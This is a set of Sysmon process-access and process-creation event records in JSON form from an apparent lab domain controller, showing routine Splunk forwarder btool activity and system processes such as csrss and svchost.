{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","TargetProcessId":"4028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.299\r\nProcessGuid: {41C8662E-1F76-5F25-0000-0010D9D70300}\r\nProcessId: 4036\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nParentProcessId: 4028\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.299","ProcessGuid":"{41C8662E-1F76-5F25-0000-0010D9D70300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F76-5F25-0000-0010CCD60300}","ParentProcessId":"4028","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nSourceProcessId: 4028\r\nSourceThreadId: 4024\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","SourceProcessId":"4028","SourceThreadId":"4024","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nTargetProcessId: 4036\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-00103B7D0300}","TargetProcessId":"4036","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
